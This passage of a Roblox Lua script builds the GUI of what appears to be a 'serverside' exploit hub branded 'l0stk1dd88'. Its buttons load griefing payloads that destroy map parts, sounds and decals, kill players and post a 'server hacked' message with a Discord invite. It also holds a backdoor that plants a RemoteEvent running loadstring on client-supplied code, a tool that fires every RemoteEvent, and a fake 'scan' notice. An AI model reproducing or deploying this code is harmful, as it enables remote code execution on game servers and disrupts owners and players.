	    if obj:IsA("Sound") then
	        obj:Destroy()
	    end
	end
	]]
		end)
	end
	
	local destroyDecalBtn = scriptHubFrame:FindFirstChild("destroydecal")
	if destroyDecalBtn and destroyDecalBtn:IsA("TextButton") then
		destroyDecalBtn.MouseButton1Click:Connect(function()
			textbox.Text = [[for _, obj in pairs(workspace:GetDescendants()) do
	    if obj:IsA("Decal") then
	        obj:Destroy()
	    end
	end
	]]
		end)
	end
	
	local hackMsgBtn = scriptHubFrame:FindFirstChild("hackmsg")
	if hackMsgBtn and hackMsgBtn:IsA("TextButton") then
		hackMsgBtn.MouseButton1Click:Connect(function()
			textbox.Text = [[local messageText = "this server has been hacked by team l0stk1dd88 you noobs! prepare for chaos! join us in disc invite:93xs9dAECK"
	
	local msg = Instance.new("Message")
	msg.Text = messageText
	msg.Parent = workspace
	
	-- Auto-remove after 4 seconds
	task.delay(6, function()
	    msg:Destroy()
	end)
	]]
		end)
	end
	
	local billBoardBtn = scriptHubFrame:FindFirstChild("billboard")
	if billBoardBtn and billBoardBtn:IsA("TextButton") then
		billBoardBtn.MouseButton1Click:Connect(function()
			textbox.Text = [[local Players = game:GetService("Players")
	
	for _, player in pairs(Players:GetPlayers()) do
	    local character = player.Character or player.CharacterAdded:Wait()
	    local head = character:FindFirstChild("Head")
	    if head then
	        local billboard = Instance.new("BillboardGui")
	        billboard.Name = "TLK88_Billboard"
	        billboard.Size = UDim2.new(0, 200, 0, 50)
	        billboard.Adornee = head
	        billboard.AlwaysOnTop = true
	        billboard.StudsOffset = Vector3.new(0, 2.5, 0) 
	        billboard.Parent = head
	
	        local label = Instance.new("TextLabel")
	        label.Size = UDim2.new(1, 0, 1, 0)
	        label.BackgroundTransparency = 1
	        label.TextColor3 = Color3.fromRGB(0, 170, 255) -- TLK88 blue
	        label.TextScaled = true
	        label.Font = Enum.Font.Legacy
	        label.Text = "l0stk1dd88"
	        label.Parent = billboard
	    end
	end
	]]
		end)
	end
	
	local timeWarpBtn = scriptHubFrame:FindFirstChild("timewarp")
	if timeWarpBtn and timeWarpBtn:IsA("TextButton") then
		timeWarpBtn.MouseButton1Click:Connect(function()
			textbox.Text = [[while true do
		game:GetService("Lighting").ClockTime = math.random(0, 24)
		task.wait(0.1)
	end
	]]
		end)
	end
	
	local tpAllBtn = scriptHubFrame:FindFirstChild("tpall")
	if tpAllBtn and tpAllBtn:IsA("TextButton") then
		tpAllBtn.MouseButton1Click:Connect(function()
			textbox.Text = [[local TeleportService = game:GetService("TeleportService")
	local targetPlaceId = 101701244760490 -- 🔁 Replace with your target experience's Place ID
	
	for _, player in pairs(game.Players:GetPlayers()) do
		TeleportService:Teleport(targetPlaceId, player)
	end
	]]
		end)
	end
	
	local billboardAllBtn = scriptHubFrame:FindFirstChild("billboardall")
	if billboardAllBtn and billboardAllBtn:IsA("TextButton") then
		billboardAllBtn.MouseButton1Click:Connect(function()
			textbox.Text = [[local Players = game:GetService("Players")
	
	-- Function to apply billboard to a player's character
	local function applyBillboard(player)
	    local function onCharacterAdded(character)
	        local head = character:WaitForChild("Head", 5)
	        if head and not head:FindFirstChild("TLK88_Billboard") then
	            local billboard = Instance.new("BillboardGui")
	            billboard.Name = "TLK88_Billboard"
	            billboard.Size = UDim2.new(0, 200, 0, 50)
	            billboard.Adornee = head
	            billboard.AlwaysOnTop = true
	            billboard.StudsOffset = Vector3.new(0, 2.5, 0)
	            billboard.Parent = head
	
	            local label = Instance.new("TextLabel")
	            label.Size = UDim2.new(1, 0, 1, 0)
	            label.BackgroundTransparency = 1
	            label.TextColor3 = Color3.fromRGB(0, 170, 255) -- TLK88 blue
	            label.TextScaled = true
	            label.Font = Enum.Font.Legacy
	            label.Text = "l0stk1dd88"
	            label.Parent = billboard
	        end
	    end
	
	    -- Apply to current character
	    if player.Character then
	        onCharacterAdded(player.Character)
	    end
	
	    -- Apply to future characters
	    player.CharacterAdded:Connect(onCharacterAdded)
	end
	
	-- Apply to all current players
	for _, player in pairs(Players:GetPlayers()) do
	    applyBillboard(player)
	end
	
	-- Apply to players who join later
	Players.PlayerAdded:Connect(applyBillboard)
	]]
		end)
	end
	
	local musicBtn = scriptHubFrame:FindFirstChild("music")
	if musicBtn and musicBtn:IsA("TextButton") then
		musicBtn.MouseButton1Click:Connect(function()
			textbox.Text = [[local SoundService = game:GetService("SoundService")
	
	-- Create the sound instance
	local sound = Instance.new("Sound")
	sound.Name = "TLK88_Loop"
	sound.SoundId = "rbxassetid://142376088"
	sound.PlaybackSpeed = 4 -- 4x speed
	sound.Looped = true
	sound.Volume = 1
	sound.Parent = SoundService
	
	-- Wait for sound to load before playing
	sound.Loaded:Connect(function()
	    sound:Play()
	end)
	
	-- Failsafe: ensure it plays even if Load event doesn't fire
	task.delay(2, function()
	    if not sound.IsPlaying then
	        sound:Play()
	    end
	end)
	]]
		end)
	end
	
	local particleBtn = scriptHubFrame:FindFirstChild("particle")
	if particleBtn and particleBtn:IsA("TextButton") then
		particleBtn.MouseButton1Click:Connect(function()
			textbox.Text = [[local Players = game:GetService("Players")
	
	local function attachParticlesToPlayer(player)
		local character = player.Character or player.CharacterAdded:Wait()
		local hrp = character:WaitForChild("HumanoidRootPart")
	
		local particle = Instance.new("ParticleEmitter")
		particle.Rate = 20
		particle.Lifetime = NumberRange.new(5)
		particle.Size = NumberSequence.new(1.1)
		particle.Texture = "rbxassetid://81013369562879" -- Optional: Replace with your own texture
		particle.Parent = hrp
	end
	
	-- Apply to all current players
	for _, player in pairs(Players:GetPlayers()) do
		attachParticlesToPlayer(player)
	end
	
	-- Apply to future players
	Players.PlayerAdded:Connect(function(player)
		player.CharacterAdded:Connect(function()
			attachParticlesToPlayer(player)
		end)
	end)
	]]
		end)
	end
	
	local anchorBtn = scriptHubFrame:FindFirstChild("anchor")
	if anchorBtn and anchorBtn:IsA("TextButton") then
		anchorBtn.MouseButton1Click:Connect(function()
			textbox.Text = [[local Workspace = game:GetService("Workspace")
	local Players = game:GetService("Players")
	
	
	for _, obj in pairs(Workspace:GetDescendants()) do
		if obj:IsA("BasePart") and obj.Anchored then
			obj.Anchored = false
		end
	end
	
	
	Workspace.FallenPartsDestroyHeight = -math.huge
	]]
		end)
	end
	
	local clearBtn = scriptHubFrame:FindFirstChild("clearrs")
	if clearBtn and clearBtn:IsA("TextButton") then
		clearBtn.MouseButton1Click:Connect(function()
			textbox.Text = [[local replicatedStorage = game:GetService("ReplicatedStorage")
	
	for _, obj in ipairs(replicatedStorage:GetChildren()) do
	    obj:Destroy()
	end
	
	--WARNING! CLEARING REPLICATEDSTORAGE WILL DELETE THE BACKDOOR AND CAUSE THE SERVERSIDE TO NOT WORK! can be used against lalol hub skids tho LOL--
	]]
		end)
	end
	
	local backdoorBtn = scriptHubFrame:FindFirstChild("backdoor")
	if backdoorBtn and backdoorBtn:IsA("TextButton") then
		backdoorBtn.MouseButton1Click:Connect(function()
			textbox.Text = [[local remote = Instance.new("RemoteEvent")
	remote.Name = "CoreSync"
	remote.Parent = game.ReplicatedStorage
	
	remote.OnServerEvent:Connect(function(player, code)
	    local success, err = pcall(function()
	        loadstring(code)()
	    end)
	    if not success then
	        warn("Execution failed:", err)
	    end
	end)
	
	--WARNING! RUNNING THIS CODE INJECTS A REMOTE EVENT AND A SERVER SIDE LISTENER THAT MAKES A BACKDOOR! USE AT YOUR OWN RISK!
	]]
		end)
	end
	
	local stringBtn = scriptHubFrame:FindFirstChild("loadstring")
	if stringBtn and stringBtn:IsA("TextButton") then
		stringBtn.MouseButton1Click:Connect(function()
			textbox.Text = [[game.ServerScriptService.LoadStringEnabled = true]]
		end)
	end
	
	local fireBtn = scriptHubFrame:FindFirstChild("fire")
	if fireBtn and fireBtn:IsA("TextButton") then
		fireBtn.MouseButton1Click:Connect(function()
			textbox.Text = [[for _, v in pairs(workspace:GetDescendants()) do
	    if v:IsA("BasePart") then
	        Instance.new("Fire", v)
	    end
	end
	]]
		end)
	end
	
	local fireringBtn = scriptHubFrame:FindFirstChild("firering")
	if fireringBtn and fireringBtn:IsA("TextButton") then
		fireringBtn.MouseButton1Click:Connect(function()
			textbox.Text = [[local Players = game:GetService("Players")
	local RunService = game:GetService("RunService")
	
	local orbitRadius = 10
	local orbitSpeed = 2 * math.pi -- 1 full orbit per second
	local partCount = 8
	
	for _, player in pairs(Players:GetPlayers()) do
	    if player.Character and player.Character:FindFirstChild("HumanoidRootPart") then
	        local center = player.Character.HumanoidRootPart
	        local parts = {}
	
	        -- Create orbiting parts
	        for i = 1, partCount do
	            local part = Instance.new("Part")
	            part.Size = Vector3.new(1, 1, 1)
	            part.Anchored = true
	            part.CanCollide = false
	            part.Transparency = 1
	            part.Name = "OrbitFire"
	            part.Parent = workspace
	
	            local fire = Instance.new("Fire")
	            fire.Size = 7
	            fire.Heat = 25
	            fire.Parent = part
	
	            table.insert(parts, part)
	        end
	
	        -- Orbit logic
	        local startTime = tick()
	        RunService.Heartbeat:Connect(function()
	            local t = tick() - startTime
	            for i, part in ipairs(parts) do
	                local angle = (t * orbitSpeed + (2 * math.pi / partCount) * i)
	                local offset = Vector3.new(math.cos(angle), 0, math.sin(angle)) * orbitRadius
	                part.Position = center.Position + offset
	            end
	        end)
	    end
	end
	]]
		end)
	end
	
	local fireAllBtn = scriptHubFrame:FindFirstChild("fireringall")
	if fireAllBtn and fireAllBtn:IsA("TextButton") then
		fireAllBtn.MouseButton1Click:Connect(function()
			textbox.Text = [[local Players = game:GetService("Players")
	local RunService = game:GetService("RunService")
	
	local orbitRadius = 10
	local orbitSpeed = 2 * math.pi -- 1 full orbit per second
	local partCount = 8
	
	local orbitData = {}
	
	-- Create orbiting parts for each player
	for _, player in pairs(Players:GetPlayers()) do
	    if player.Character and player.Character:FindFirstChild("HumanoidRootPart") then
	        local center = player.Character.HumanoidRootPart
	        local parts = {}
	
	        for i = 1, partCount do
	            local part = Instance.new("Part")
	            part.Size = Vector3.new(1, 1, 1)
	            part.Anchored = true
	            part.CanCollide = false
	            part.Transparency = 1
	            part.Name = "OrbitFire"
	            part.Parent = workspace
	
	            local fire = Instance.new("Fire")
	            fire.Size = 7
	            fire.Heat = 25
	            fire.Parent = part
	
	            table.insert(parts, part)
	        end
	
	        orbitData[player] = {
	            center = center,
	            parts = parts,
	            startTime = tick()
	        }
	    end
	end
	
	-- Orbit logic for all players
	RunService.Heartbeat:Connect(function()
	    for player, data in pairs(orbitData) do
	        if player.Character and data.center then
	            local t = tick() - data.startTime
	            for i, part in ipairs(data.parts) do
	                local angle = (t * orbitSpeed + (2 * math.pi / partCount) * i)
	                local offset = Vector3.new(math.cos(angle), 0, math.sin(angle)) * orbitRadius
	                part.Position = data.center.Position + offset
	            end
	        end
	    end
	end)
	]]
		end)
	end
	
	local meteorBtn = scriptHubFrame:FindFirstChild("meteor")
	if meteorBtn and meteorBtn:IsA("TextButton") then
		meteorBtn.MouseButton1Click:Connect(function()
			textbox.Text = [[local Players = game:GetService("Players")
	local Debris = game:GetService("Debris")
	
	local duration = 30 -- seconds
	local spawnRate = 0.2 -- seconds between meteors
	local meteorSize = Vector3.new(20, 20, 20)
	local fireSize = 20
	local fireHeat = 25
	local killRadius = 14
	
	local function spawnMeteor()
	    local targetOrigin = math.random() > 0.55 -- 45% chance to target origin zone
	    local x, z
	
	    if targetOrigin then
	        x = math.random(-30, 30)
	        z = math.random(-30, 30)
	    else
	        x = math.random(-500, 500)
	        z = math.random(-500, 500)
	    end
	
	    local meteor = Instance.new("Part")
	    meteor.Size = meteorSize
	    meteor.Shape = Enum.PartType.Ball
	    meteor.Material = Enum.Material.CrackedLava
	    meteor.Anchored = false
	    meteor.CanCollide = true
	    meteor.Position = Vector3.new(x, 150, z)
	    meteor.Name = "Meteor"
	    meteor.Parent = workspace
	
	    local fire = Instance.new("Fire")
	    fire.Size = fireSize
	    fire.Heat = fireHeat
	    fire.Parent = meteor
	
	    meteor.Touched:Connect(function(hit)
	        if not meteor:IsDescendantOf(workspace) then return end
	
	        local explosion = Instance.new("Explosion")
	        explosion.Position = meteor.Position
	        explosion.BlastRadius = 0 -- no default damage
	        explosion.Parent = workspace
	
	        for _, player in pairs(Players:GetPlayers()) do
	            if player.Character and player.Character:FindFirstChild("HumanoidRootPart") then
	                local dist = (player.Character.HumanoidRootPart.Position - meteor.Position).Magnitude
	                if dist <= killRadius then
	                    local humanoid = player.Character:FindFirstChildOfClass("Humanoid")
	                    if humanoid then
	                        humanoid.Health = 0
	                    end
	                end
	            end
	        end
	
	        meteor:Destroy()
	    end)
	
	    Debris:AddItem(meteor, 10)
	end
	
	
	local startTime = tick()
	while tick() - startTime < duration do
	    spawnMeteor()
	    task.wait(spawnRate)
	end
	]]
		end)
	end
end;
task.spawn(C_e);
-- StarterGui.ScreenGui.Frame.ScriptHubFrame.LocalScript
local function C_f()
local script = G2L["f"];
	local frame = script.Parent
	
	frame.Visible = false
end;
task.spawn(C_f);
-- StarterGui.ScreenGui.Frame.Execute.LocalScript
local function C_35()
local script = G2L["35"];
	local button = script.Parent
	local player = game:GetService("Players").LocalPlayer
	local mouse = player:GetMouse()
	
	local tooltip
	
	button.MouseEnter:Connect(function()
		tooltip = Instance.new("TextLabel")
		tooltip.Text = "Execute code/require from TextBox"
		tooltip.BackgroundTransparency = 0.3
		tooltip.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		tooltip.TextColor3 = Color3.fromRGB(255, 255, 255)
		tooltip.Font = Enum.Font.SourceSans
		tooltip.TextSize = 14
		tooltip.Size = UDim2.new(0, 120, 0, 25)
		tooltip.Position = UDim2.new(0, mouse.X + 10, 0, mouse.Y + 10)
		tooltip.ZIndex = 999
		tooltip.Name = "TLK88Tooltip"
		tooltip.TextScaled = true
		tooltip.Parent = button:FindFirstAncestorOfClass("ScreenGui")
	
		-- Update position every frame
		local connection
		connection = game:GetService("RunService").RenderStepped:Connect(function()
			if tooltip then
				tooltip.Position = UDim2.new(0, mouse.X + 10, 0, mouse.Y + 10)
			else
				connection:Disconnect()
			end
		end)
	end)
	
	button.MouseLeave:Connect(function()
		if tooltip then
			tooltip:Destroy()
			tooltip = nil
		end
	end)
end;
task.spawn(C_35);
-- StarterGui.ScreenGui.Frame.Clear.LocalScript
local function C_37()
local script = G2L["37"];
	local button = script.Parent
	local player = game:GetService("Players").LocalPlayer
	local mouse = player:GetMouse()
	
	local tooltip
	
	button.MouseEnter:Connect(function()
		tooltip = Instance.new("TextLabel")
		tooltip.Text = "Clear TextBox"
		tooltip.BackgroundTransparency = 0.3
		tooltip.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		tooltip.TextColor3 = Color3.fromRGB(255, 255, 255)
		tooltip.Font = Enum.Font.SourceSans
		tooltip.TextSize = 14
		tooltip.Size = UDim2.new(0, 120, 0, 25)
		tooltip.Position = UDim2.new(0, mouse.X + 10, 0, mouse.Y + 10)
		tooltip.ZIndex = 999
		tooltip.Name = "TLK88Tooltip"
		tooltip.TextScaled = true
		tooltip.Parent = button:FindFirstAncestorOfClass("ScreenGui")
	
		-- Update position every frame
		local connection
		connection = game:GetService("RunService").RenderStepped:Connect(function()
			if tooltip then
				tooltip.Position = UDim2.new(0, mouse.X + 10, 0, mouse.Y + 10)
			else
				connection:Disconnect()
			end
		end)
	end)
	
	button.MouseLeave:Connect(function()
		if tooltip then
			tooltip:Destroy()
			tooltip = nil
		end
	end)
end;
task.spawn(C_37);
-- StarterGui.ScreenGui.Frame.Inject.LocalScript
local function C_39()
local script = G2L["39"];
	local button = script.Parent
	local StarterGui = game:GetService("StarterGui")
	
	button.MouseButton1Click:Connect(function()
		local startTime = tick()
	
		-- Random delay between 0.05 and 0.10 seconds
		local delayTime = math.random(2, 4) / 100
		task.wait(delayTime)
	
		local endTime = tick()
		local elapsed = endTime - startTime
		local formattedTime = string.format("%.2f", elapsed)
	
		StarterGui:SetCore("SendNotification", {
			Title = "Scan complete",
			Text = "Scanned all RemoteEvents in " .. formattedTime .. "s. Check console or fire with test payload like Kill All.",
			Duration = 8
		})
	end)
end;
task.spawn(C_39);
-- StarterGui.ScreenGui.Frame.Inject.LocalScript
local function C_3a()
local script = G2L["3a"];
	-- Place this LocalScript inside your TextButton
	local button = script.Parent
	local screenGui = button.Parent
	local textBox = screenGui:FindFirstChild("TextBox")
	
	-- Track whether it's been unlocked
	local unlocked = false
	
	-- Initial lock and message
	if textBox then
		textBox.Text = "Inject first!"
		textBox.Active = false
		textBox.Selectable = false
		textBox.TextEditable = false
	
		-- Prevent external edits before unlock
		textBox:GetPropertyChangedSignal("Text"):Connect(function()
			if not unlocked then
				textBox.Text = "Inject first!"
			end
		end)
	end
	
	-- Unlock on first button click
	button.MouseButton1Click:Connect(function()
		if textBox and not unlocked then
			unlocked = true
			textBox.TextEditable = true
			textBox.Active = true
			textBox.Selectable = true
			textBox.Text = "" -- Clear only once
		end
	end)
end;
task.spawn(C_3a);
-- StarterGui.ScreenGui.Frame.Inject.LocalScript
local function C_3b()
local script = G2L["3b"];
	local button = script.Parent
	local player = game:GetService("Players").LocalPlayer
	local mouse = player:GetMouse()
	
	local tooltip
	
	button.MouseEnter:Connect(function()
		tooltip = Instance.new("TextLabel")
		tooltip.Text = "Inject/scan for backdoors"
		tooltip.BackgroundTransparency = 0.3
		tooltip.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		tooltip.TextColor3 = Color3.fromRGB(255, 255, 255)
		tooltip.Font = Enum.Font.SourceSans
		tooltip.TextSize = 14
		tooltip.Size = UDim2.new(0, 120, 0, 25)
		tooltip.Position = UDim2.new(0, mouse.X + 10, 0, mouse.Y + 10)
		tooltip.ZIndex = 999
		tooltip.Name = "TLK88Tooltip"
		tooltip.TextScaled = true
		tooltip.Parent = button:FindFirstAncestorOfClass("ScreenGui")
	
		-- Update position every frame
		local connection
		connection = game:GetService("RunService").RenderStepped:Connect(function()
			if tooltip then
				tooltip.Position = UDim2.new(0, mouse.X + 10, 0, mouse.Y + 10)
			else
				connection:Disconnect()
			end
		end)
	end)
	
	button.MouseLeave:Connect(function()
		if tooltip then
			tooltip:Destroy()
			tooltip = nil
		end
	end)
end;
task.spawn(C_3b);
-- StarterGui.ScreenGui.Frame.Inject.LocalScript
local function C_3c()
local script = G2L["3c"];
	local button = script.Parent
	
	button.MouseButton1Click:Connect(function()
		local screenGui = button:FindFirstAncestorOfClass("ScreenGui")
		if not screenGui then return end
	
		local frame = screenGui:FindFirstChild("Frame")
		if not frame then return end
	
		local labelFrame = frame:FindFirstChild("LabelFrame")
		if not labelFrame then return end
	
		local remoteLabel = labelFrame:FindFirstChild("RemoteLabel")
		if not remoteLabel or not remoteLabel:IsA("TextLabel") then return end
	
		remoteLabel.Text = "Check console for results"
	end)
end;
task.spawn(C_3c);
-- StarterGui.ScreenGui.Frame.ImageButton.LocalScript
local function C_3e()
local script = G2L["3e"];
	local button = script.Parent
	
	button.MouseButton1Click:Connect(function()
		for _, obj in pairs(game:GetDescendants()) do
			if obj:IsA("RemoteEvent") then
				pcall(function()
					obj:FireServer()
				end)
			end
		end
	end)
end;
task.spawn(C_3e);
-- StarterGui.ScreenGui.Frame.ImageButton.LocalScript
local function C_3f()
local script = G2L["3f"];
	local button = script.Parent
	local player = game:GetService("Players").LocalPlayer
	local mouse = player:GetMouse()
	
	local tooltip
	
	button.MouseEnter:Connect(function()
		tooltip = Instance.new("TextLabel")
		tooltip.Text = "Fire all RemoteEvents"
		tooltip.BackgroundTransparency = 0.3
		tooltip.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		tooltip.TextColor3 = Color3.fromRGB(255, 255, 255)
		tooltip.Font = Enum.Font.SourceSans
		tooltip.TextSize = 14
		tooltip.Size = UDim2.new(0, 120, 0, 25)
		tooltip.Position = UDim2.new(0, mouse.X + 10, 0, mouse.Y + 10)
		tooltip.ZIndex = 999
		tooltip.Name = "TLK88Tooltip"
		tooltip.Parent = button:FindFirstAncestorOfClass("ScreenGui")
	
		-- Update position every frame
		local connection
		connection = game:GetService("RunService").RenderStepped:Connect(function()
			if tooltip then
				tooltip.Position = UDim2.new(0, mouse.X + 10, 0, mouse.Y + 10)
			else
				connection:Disconnect()
			end
		end)
	end)
	
	button.MouseLeave:Connect(function()
		if tooltip then
			tooltip:Destroy()
			tooltip = nil
		end
	end)
end;
task.spawn(C_3f);
-- StarterGui.ScreenGui.Frame.ImageButton.LocalScript
local function C_41()
local script = G2L["41"];
	local button = script.Parent
	
	button.MouseButton1Click:Connect(function()
		for _, obj in pairs(game:GetDescendants()) do
			if obj:IsA("RemoteEvent") then
				print(obj:GetFullName())
			end
		end
	end)
end;
task.spawn(C_41);
-- StarterGui.ScreenGui.Frame.ImageButton.LocalScript
local function C_42()
local script = G2L["42"];
	local button = script.Parent
	local player = game:GetService("Players").LocalPlayer
	local mouse = player:GetMouse()
	
	local tooltip
	
	button.MouseEnter:Connect(function()
		tooltip = Instance.new("TextLabel")
		tooltip.Text = "Print all RemoteEvents"
		tooltip.BackgroundTransparency = 0.3
		tooltip.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		tooltip.TextColor3 = Color3.fromRGB(255, 255, 255)
		tooltip.Font = Enum.Font.SourceSans
		tooltip.TextSize = 14
		tooltip.Size = UDim2.new(0, 120, 0, 25)
		tooltip.Position = UDim2.new(0, mouse.X + 10, 0, mouse.Y + 10)
		tooltip.ZIndex = 999
		tooltip.Name = "TLK88Tooltip"
		tooltip.Parent = button:FindFirstAncestorOfClass("ScreenGui")
	
		-- Update position every frame
		local connection
		connection = game:GetService("RunService").RenderStepped:Connect(function()
			if tooltip then
				tooltip.Position = UDim2.new(0, mouse.X + 10, 0, mouse.Y + 10)
			else
				connection:Disconnect()
			end
		end)
	end)
	
	button.MouseLeave:Connect(function()
		if tooltip then
			tooltip:Destroy()
			tooltip = nil
		end
	end)
end;
task.spawn(C_42);
-- StarterGui.ScreenGui.Frame.ImageButton.LocalScript
local function C_45()
local script = G2L["45"];
	local button = script.Parent
	local parentFrame = button.Parent
	local scriptHub = parentFrame:WaitForChild("ScriptHubFrame")
	
	button.MouseButton1Click:Connect(function()
		scriptHub.Visible = not scriptHub.Visible
	end)
end;
task.spawn(C_45);
-- StarterGui.ScreenGui.Frame.ImageButton.LocalScript
local function C_46()
local script = G2L["46"];
	local button = script.Parent
	local player = game:GetService("Players").LocalPlayer
	local mouse = player:GetMouse()
	
	local tooltip
	
	button.MouseEnter:Connect(function()
		tooltip = Instance.new("TextLabel")
		tooltip.Text = "Script/code Hub"
		tooltip.BackgroundTransparency = 0.3
		tooltip.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		tooltip.TextColor3 = Color3.fromRGB(255, 255, 255)
		tooltip.Font = Enum.Font.SourceSans
		tooltip.TextSize = 14
		tooltip.Size = UDim2.new(0, 120, 0, 25)
		tooltip.Position = UDim2.new(0, mouse.X + 10, 0, mouse.Y + 10)
		tooltip.ZIndex = 999
		tooltip.Name = "TLK88Tooltip"
		tooltip.Parent = button:FindFirstAncestorOfClass("ScreenGui")
	
		-- Update position every frame
		local connection
		connection = game:GetService("RunService").RenderStepped:Connect(function()
			if tooltip then
				tooltip.Position = UDim2.new(0, mouse.X + 10, 0, mouse.Y + 10)
			else
				connection:Disconnect()
			end
		end)
	end)
	
	button.MouseLeave:Connect(function()
		if tooltip then
			tooltip:Destroy()
			tooltip = nil
		end
	end)
end;
task.spawn(C_46);
-- StarterGui.ScreenGui.Frame.ImageButton.LocalScript
local function C_50()
local script = G2L["50"];
	local button = script.Parent
	local screenGui = button:FindFirstAncestorOfClass("ScreenGui")
	
	button.MouseButton1Click:Connect(function()
		if screenGui then
			screenGui:Destroy()
		end
	end)
end;
task.spawn(C_50);
-- StarterGui.ScreenGui.Frame.ImageButton.LocalScript
local function C_51()
local script = G2L["51"];
	local button = script.Parent
	local player = game:GetService("Players").LocalPlayer
	local mouse = player:GetMouse()
	
	local tooltip
	
	button.MouseEnter:Connect(function()
		tooltip = Instance.new("TextLabel")
		tooltip.Text = "Close Serverside"
		tooltip.BackgroundTransparency = 0.3
		tooltip.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		tooltip.TextColor3 = Color3.fromRGB(255, 255, 255)
		tooltip.Font = Enum.Font.SourceSans
		tooltip.TextSize = 14
		tooltip.Size = UDim2.new(0, 120, 0, 25)
		tooltip.Position = UDim2.new(0, mouse.X + 10, 0, mouse.Y + 10)
		tooltip.ZIndex = 999
		tooltip.Name = "TLK88Tooltip"
		tooltip.Parent = button:FindFirstAncestorOfClass("ScreenGui")
	
		-- Update position every frame
		local connection
		connection = game:GetService("RunService").RenderStepped:Connect(function()
			if tooltip then
				tooltip.Position = UDim2.new(0, mouse.X + 10, 0, mouse.Y + 10)
			else
				connection:Disconnect()
			end
		end)
	end)
	
	button.MouseLeave:Connect(function()
		if tooltip then
			tooltip:Destroy()
			tooltip = nil
		end
	end)
end;
task.spawn(C_51);

return G2L["1"], require;
